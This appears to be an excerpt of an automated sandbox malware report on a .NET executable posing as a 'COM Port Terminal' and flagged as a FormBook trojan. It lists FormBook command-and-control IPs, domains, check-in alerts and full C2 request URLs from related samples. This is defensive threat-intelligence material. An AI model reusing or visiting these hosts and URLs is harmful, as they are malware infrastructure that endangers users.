                                                        http://www.fonts.com56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.sandoll.co.kr56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.urwpp.deDPlease56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.zhongyicts.com.cn56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sakkal.com56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          213.186.33.5
                                                          www.box-770.comFrance
                                                          16276OVHFRtrue
                                                          52.5.157.71
                                                          mitiendanube.comUnited States
                                                          14618AMAZON-AESUSfalse
                                                          216.10.241.4
                                                          rajinderbeas.comIndia
                                                          394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                          67.205.83.103
                                                          ps-sac.comCanada
                                                          32613IWEB-ASCAtrue
                                                          31.170.167.144
                                                          thecrystalconsciousness.comUnited States
                                                          47583AS-HOSTINGERLTtrue
                                                          154.208.173.144
                                                          www.nhmingwei.comSeychelles
                                                          40065CNSERVERSUStrue
                                                          148.72.177.185
                                                          txsports.clubUnited States
                                                          30083AS-30083-GO-DADDY-COM-LLCUStrue

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:502358
                                                          Start date:13.10.2021
                                                          Start time:20:33:16
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 8s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:56460021473877.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:17
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@7/1@11/7
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 11.3% (good quality ratio 10%)
                                                          • Quality average: 72.3%
                                                          • Quality standard deviation: 32.5%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.42.73.29, 52.182.143.212, 95.100.218.79, 20.82.209.183, 93.184.221.240, 8.247.248.249, 8.247.248.223, 8.247.244.221, 20.54.110.249, 52.251.79.25, 40.112.88.60, 2.20.178.33, 2.20.178.24, 20.49.157.6
                                                          • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, onedsblobprdeus15.eastus.cloudapp.azure.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          20:34:33API Interceptor1x Sleep call for process: 56460021473877.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          213.186.33.5Inquiry.PDF.exeGet hashmaliciousBrowse
                                                          • www.cryptoinvestyl.com/useb/?7n=rb5KM645fVULn9EIjNiSrLrXZnTqgwo0qZgPr8vcAbC+lV8HIDgfBu567M4OIFSdpGDP&CXKP2l=8p0TGj
                                                          yutrre123.exeGet hashmaliciousBrowse
                                                          • www.ip-15-235-90.net/rv9n/?C6=x2M4VzrxS8spav6&3f0Px0=FD98TgmDYK3tjsbSVN2Nn1kPM3cY7rQmBH5fe1GuppdV1PN8TumzKy7zNy0mePzpYunk
                                                          dec.exeGet hashmaliciousBrowse
                                                          • www.tapissier-uzes.com/s8ne/?9rHTW2=IywSeCxzvG/YbuYEB/7xRU7gTHZ1GMcetuZx3hUN2sl3h+qfJ8uqi3N8u2LKyEmrUvK6&lDK=Xjl0dx
                                                          CV 10-06-2021.xlsxGet hashmaliciousBrowse
                                                          • www.privatelymeeting.com/shjn/?FJB0bfcP=WC6mZM08I0NlfqwnwDG6ZhC66ih1U/GhUT+zKl6s+Bbyt2zvJc6FkKkmrbUpziPgwvGuWw==&d8r=-ZKPkTnXET
                                                          PO#006599.pdf.exeGet hashmaliciousBrowse
                                                          • www.sddebouchages.com/nid3/?j2=q+qg5ou/T18Br1UU7xG8BDYHxAIosKClNMKdAj4hUI0MbrFMjo+h1vfAQy7FTgCwKj96&f6P=_BiLl69PCpItC2
                                                          Remittance Advice.xlsxGet hashmaliciousBrowse
                                                          • www.enjoy-developpement.com/hr8n/?e2JtT=jVeTzlG8KlLhA&ufbtFP7=kc5QOVL9/kFolziHANyozIdA+E/RkrEUwpNevQ3EWN3VSWNw6VvEOavxIY6bu6qwhQYyYQ==
                                                          BYSM-207 SC TRIFTECH78574543957Baku.exeGet hashmaliciousBrowse
                                                          • www.box-770.com/ni8b/?QrNTzB=4hVp3h30&l48x5=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKkjK8OPG1pp1
                                                          Swift Copy.exeGet hashmaliciousBrowse
                                                          • www.eu-cc-scheme-isac.com/eods/?i8kt=F9Ltz4hjiu0I6+j2wV/8Zk7bshxyTBv8V8Zgjkg9hKKY4Q/4fXaSPDL1y2LmX9E023W3&1bRLa=YfFxl
                                                          bank statement 001.pdf.exeGet hashmaliciousBrowse
                                                          • www.immobilier-alienor.net/kv3e/?r8-TmHk=MYvoXz2D7s00WneKts1QcPEMBjkRPGDQjHxDd33pXFG+ah/E7j9jeXrxmDoOt0yv/vOP&D2MxVv=LPpxnp
                                                          rrfee1234.exeGet hashmaliciousBrowse
                                                          • www.ip-15-235-90.net/rv9n/?6lu=FD98TgmDYK3tjsbSVN2Nn1kPM3cY7rQmBH5fe1GuppdV1PN8TumzKy7zNxU2RujRGLOj&r2Md=bFQLHr_XK
                                                          Invoice Packing list.exeGet hashmaliciousBrowse
                                                          • www.eu-cc-scheme-isac.com/eods/?tL30a=N8zxsVvhhbBLjNRp&6liXpZH=F9Ltz4hjiu0I6+j2wV/8Zk7bshxyTBv8V8Zgjkg9hKKY4Q/4fXaSPDL1y2LmX9E023W3
                                                          OApfyh3Vfm.exeGet hashmaliciousBrowse
                                                          • www.privatelymeeting.com/shjn/?BZXds2=WC6mZM05IzNhf68ryDG6ZhC66ih1U/GhUTmjWmmt6hbztHfpOMrJyOcko+4VoC7T/uTe&jlW=5jIhet3
                                                          P.O Turkey_51021.exeGet hashmaliciousBrowse
                                                          • www.badji-consulting.com/un3a/?7nH=/xgtpsrvNhmWseN6B+mMwD/3zlqwXFzD6Ke4Te1hFrO2JhIa3A3FpEDoKU5ARwPQSZkM&i6y=iVkD
                                                          SOA.exeGet hashmaliciousBrowse
                                                          • www.eu-cc-scheme-isac.com/eods/?e2M=B48tCN&0488qv=F9Ltz4hjiu0I6+j2wV/8Zk7bshxyTBv8V8Zgjkg9hKKY4Q/4fXaSPDL1y2LmX9E023W3
                                                          Z14S9Zolcyub1pd.exeGet hashmaliciousBrowse
                                                          • www.edgar-regale.com/jdt0/?YPyd=QpNqCCk/w5C4FJ2XvGA42+trnKyHbnMin3ffX2+aSQ3Q0hQJTWPTFDZX55IzwXmDjCim&Z8atc=2dtlDXLP5h8H2Zg0
                                                          DOC.exeGet hashmaliciousBrowse
                                                          • www.hotel-balzac.paris/n58i/?RFN0Kv=04fPn6sxaFNHz&Q0DL4pLH=cltUg8I60wQSNq1POnzUEQl5YYU1bxKdSkbeF3W90ZOnJRrjtJdPokcfzu1BtUzjohcR
                                                          USD INV#1191189.xlsxGet hashmaliciousBrowse
                                                          • www.lacageavin.com/b6cu/?n6=B6rzKVNhwWBrYBudNzJT/AwPBizW8k3hcm2KU8VARUNeylPckMLclLMptxRkmVZCwNt3mQ==&xTBXUJ=6lftpVLP0d
                                                          New Order.exeGet hashmaliciousBrowse
                                                          • www.lacageavin.com/b6cu/?I6Al=wTVDQbk0M6&R48=B6rzKVNkwRBvYRiRPzJT/AwPBizW8k3hcmuaI/JBV0NfyUjajcaQzP0ruXRi+0BK87ZW/sllUQ==
                                                          prueba22.exeGet hashmaliciousBrowse
                                                          • www.bosc.pro/a0ce/?O2Mp=p3W6tZqqMh9cyJWI+Ifxtu9b3XcFtsvySVo7/NVrh1mIcTF+GwrcSSrI+V7FI7p/2Fok5w==&cT_T=9ra0stsXZtHLPLNp
                                                          Swift Copy.exeGet hashmaliciousBrowse
                                                          • www.votreconseilfinancier.com/b6cu/?2dSpM=5FGFntgWmLj4vD/wcjkbKA/XjB0p23UKe5ZDLLIhgH6ngvA+ZRqv804x9gqeYQWIj44x&PVvtW=7nWhA

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          mitiendanube.comFanCourier54488203expediere doc202177.exeGet hashmaliciousBrowse
                                                          • 52.200.197.31
                                                          f41e9f9d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                          • 52.206.238.9
                                                          20210303948387477467,pdf.exeGet hashmaliciousBrowse
                                                          • 52.200.197.31
                                                          2021_036,pdf.exeGet hashmaliciousBrowse
                                                          • 52.5.157.71
                                                          www.sapphiremodule.comPeq0Amq9EP.exeGet hashmaliciousBrowse
                                                          • 44.227.76.166
                                                          www.box-770.comBYSM-207 SC TRIFTECH78574543957Baku.exeGet hashmaliciousBrowse
                                                          • 213.186.33.5

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          OVHFRSecuriteInfo.com.Exploit.Siggen3.21227.11912.xlsGet hashmaliciousBrowse
                                                          • 188.165.62.61
                                                          SecuriteInfo.com.Exploit.Siggen3.21227.11912.xlsGet hashmaliciousBrowse
                                                          • 188.165.62.61
                                                          yHm66D4wla.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          FIDTIpakSU.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          BobglLrEyi.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          Pxnrz0DXD3.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          ZHuOtLRXeM.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          SecuriteInfo.com.Artemis9D180B40D96E.25394.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          SecuriteInfo.com.Heur.12255.xlsGet hashmaliciousBrowse
                                                          • 188.165.62.61
                                                          SecuriteInfo.com.ML.PE-A.4403.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          SecuriteInfo.com.ML.PE-A.28995.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          SecuriteInfo.com.ML.PE-A.4995.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          SecuriteInfo.com.Heur.17985.xlsGet hashmaliciousBrowse
                                                          • 188.165.62.61
                                                          qDXRTsZAL9.exeGet hashmaliciousBrowse
                                                          • 139.99.118.252
                                                          SecuriteInfo.com.Heur.12255.xlsGet hashmaliciousBrowse
                                                          • 188.165.62.61
                                                          h9WnY2tOg7.dllGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          SecuriteInfo.com.Heur.17985.xlsGet hashmaliciousBrowse
                                                          • 188.165.62.61
                                                          Payment_Receipt 7183.xlsGet hashmaliciousBrowse
                                                          • 51.83.3.52
                                                          SecuriteInfo.com.Heur.21879.xlsGet hashmaliciousBrowse
                                                          • 188.165.62.61
                                                          EXPORT INVOICE 2021.exeGet hashmaliciousBrowse
                                                          • 51.161.86.13
                                                          AMAZON-AESUScvWFjfKtdHGet hashmaliciousBrowse
                                                          • 44.200.82.228
                                                          Payment Confirmation.exeGet hashmaliciousBrowse
                                                          • 3.223.115.185
                                                          Payment Information MT103.exeGet hashmaliciousBrowse
                                                          • 18.215.13.95
                                                          qalTySElfjGet hashmaliciousBrowse
                                                          • 34.226.20.105
                                                          rLGunciziYGet hashmaliciousBrowse
                                                          • 54.196.47.175
                                                          JuufQURFPh.exeGet hashmaliciousBrowse
                                                          • 50.16.216.118
                                                          ut5yFyWEDdGet hashmaliciousBrowse
                                                          • 44.222.19.141
                                                          jew.x86Get hashmaliciousBrowse
                                                          • 54.167.221.252
                                                          ckYh27IjHJGet hashmaliciousBrowse
                                                          • 34.236.224.188
                                                          TM2ALMOZ8QGet hashmaliciousBrowse
                                                          • 18.205.154.215
                                                          cM5cZsOuggGet hashmaliciousBrowse
                                                          • 54.138.164.249
                                                          jew.x86Get hashmaliciousBrowse
                                                          • 35.172.163.150
                                                          DHL-Waybill.exeGet hashmaliciousBrowse
                                                          • 54.208.212.1
                                                          UaBxIF11A6Get hashmaliciousBrowse
                                                          • 54.82.231.227
                                                          80wVQ9c87mGet hashmaliciousBrowse
                                                          • 34.238.201.118
                                                          ubr43ro8gnGet hashmaliciousBrowse
                                                          • 52.3.190.129
                                                          DQak2G9Ly5Get hashmaliciousBrowse
                                                          • 44.196.235.84
                                                          x86Get hashmaliciousBrowse
                                                          • 54.53.174.239
                                                          sora.x86Get hashmaliciousBrowse
                                                          • 44.192.229.159
                                                          xd.armGet hashmaliciousBrowse
                                                          • 52.0.161.15

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\56460021473877.exe.log
                                                          Process:C:\Users\user\Desktop\56460021473877.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.175639493174068
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:56460021473877.exe
                                                          File size:569856
                                                          MD5:d95e9bb2fa064a984c391b5bfc1d01e6
                                                          SHA1:6b045974084794b785110909351e2a25950c5ed6
                                                          SHA256:b499be4b6955eebcf4228039f67a65a38b322f0ca1d58d8071de9a428ced8720
                                                          SHA512:8aa2c31ca9b1dc7ef64c45f8c2f56ca2d4df57d1ee05a31dc213e8ac868dbf2b520111c77b68991c6a5f4bb61def3c44a4182b7a4359501bcf892c50d19682aa
                                                          SSDEEP:6144:t1DEMkhBBcKqMkXKQEa2F7A4quO15IWwPGQscHLHXQpCIOZBxPFPgN21c1:nD/SBBcErSqqflwPGQQpFINPgNP1
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.fa..............0.................. ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:71f0e4d8d0e0f0f0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x45b9b6
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x6166DF60 [Wed Oct 13 13:30:08 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5b9640x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x313e4.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x599bc0x59a00False0.859723675035data7.73073019644IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x5c0000x313e40x31400False0.441118734137data5.72292205998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x8e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountry
                                                          RT_ICON0x5c2000x9311PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                          RT_ICON0x655240x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                          RT_ICON0x75d5c0x94a8data
                                                          RT_ICON0x7f2140x5488data
                                                          RT_ICON0x846ac0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 3774873599, next used block 4294967047
                                                          RT_ICON0x888e40x25a8data
                                                          RT_ICON0x8ae9c0x10a8data
                                                          RT_ICON0x8bf540x988data
                                                          RT_ICON0x8c8ec0x468GLS_BINARY_LSB_FIRST
                                                          RT_GROUP_ICON0x8cd640x84data
                                                          RT_VERSION0x8cdf80x3eadata
                                                          RT_MANIFEST0x8d1f40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Version Infos

                                                          DescriptionData
                                                          Translation0x0000 0x04b0
                                                          LegalCopyright
                                                          Assembly Version2.11.3.0
                                                          InternalNameCLSCompliantAttribu.exe
                                                          FileVersion2.11.0.0
                                                          CompanyNameJan Axelson's Lakeview Research
                                                          LegalTrademarks
                                                          CommentsDemonstrates communications between two COM ports
                                                          ProductNameCOM Port Terminal
                                                          ProductVersion2.11.0.0
                                                          FileDescriptionCOM Port Terminal
                                                          OriginalFilenameCLSCompliantAttribu.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          10/13/21-20:35:31.965433TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.4154.208.173.144
                                                          10/13/21-20:35:31.965433TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.4154.208.173.144
                                                          10/13/21-20:35:31.965433TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.4154.208.173.144
                                                          10/13/21-20:35:42.859962TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.467.205.83.103
                                                          10/13/21-20:35:42.859962TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.467.205.83.103
                                                          10/13/21-20:35:42.859962TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.467.205.83.103
                                                          10/13/21-20:36:15.000572TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985180192.168.2.431.170.167.144
                                                          10/13/21-20:36:15.000572TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985180192.168.2.431.170.167.144
                                                          10/13/21-20:36:15.000572TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985180192.168.2.431.170.167.144
                                                          10/13/21-20:36:31.327510TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985480192.168.2.444.227.65.245
                                                          10/13/21-20:36:31.327510TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985480192.168.2.444.227.65.245
                                                          10/13/21-20:36:31.327510TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985480192.168.2.444.227.65.245

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 13, 2021 20:35:31.690421104 CEST4981180192.168.2.4154.208.173.144
                                                          Oct 13, 2021 20:35:31.964966059 CEST8049811154.208.173.144192.168.2.4
                                                          Oct 13, 2021 20:35:31.965118885 CEST4981180192.168.2.4154.208.173.144
                                                          Oct 13, 2021 20:35:31.965432882 CEST4981180192.168.2.4154.208.173.144
                                                          Oct 13, 2021 20:35:32.239753962 CEST8049811154.208.173.144192.168.2.4
                                                          Oct 13, 2021 20:35:32.247359991 CEST8049811154.208.173.144192.168.2.4
                                                          Oct 13, 2021 20:35:32.247539997 CEST4981180192.168.2.4154.208.173.144
                                                          Oct 13, 2021 20:35:32.247581959 CEST4981180192.168.2.4154.208.173.144
                                                          Oct 13, 2021 20:35:32.522032976 CEST8049811154.208.173.144192.168.2.4
                                                          Oct 13, 2021 20:35:37.323235989 CEST4981580192.168.2.452.5.157.71
                                                          Oct 13, 2021 20:35:37.470927000 CEST804981552.5.157.71192.168.2.4
                                                          Oct 13, 2021 20:35:37.474730968 CEST4981580192.168.2.452.5.157.71
                                                          Oct 13, 2021 20:35:37.474766970 CEST4981580192.168.2.452.5.157.71
                                                          Oct 13, 2021 20:35:37.627887964 CEST804981552.5.157.71192.168.2.4
                                                          Oct 13, 2021 20:35:37.627907038 CEST804981552.5.157.71192.168.2.4
